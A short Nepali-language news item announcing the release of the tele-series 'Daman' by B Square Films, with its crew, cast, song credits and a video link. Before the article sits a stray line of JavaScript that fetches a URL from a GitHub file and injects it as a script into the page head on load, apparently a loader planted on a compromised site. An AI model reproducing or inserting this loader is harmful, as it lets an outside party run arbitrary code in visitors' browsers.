;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज , काठमाडौँ |
B square Films ले साउन २७ गते देखि “दमन” नामक सामाजिक घटनामा सम्बन्धित टेली शृंखला सार्वजनिक गरेको छ | उक्त शृंखलामा निर्माता, निर्देशन र सम्पादन बिश्वास भण्डारीले गरेका हुन् भने सह निर्देशन बाबु सेन्चुरीले गरेका छन् | त्यसै गरि दमनको छायांकन एदिप कुलुंङ राइले गरेका हुन् भने पुरुषोतम खतिवडाको लेखन रहेको छ |
दमन टेली शृंखलामा कलाकारहरु बाबु सेन्चुरी, सुप्रिया राउत, बीबी राना, कुमार अधिकारि, पि.यस खतिवडा , मिना जिसी, चन्दा बिडारी, रेशन फिरिरी, एदिप कुलुंङ राइ, कुमार दंगाल, अन्जली थापा लगायतले अभिनय गरेका छन् | बुद्ध स्यांग्बाको संगीत र कमल रुम्बाको शब्द रहेको उक्त गीतमा गोबिन्द गुरागाईं र जिना रसाइलीको स्वर रहेको छ |
भिडियो हेर्नुहोस : यो लिंकमा पनि हेर्न सक्नु हुन्छ :
https://youtu.be/hR8UwbIFRQk
फेसबुक प्रतिक्रियाहरु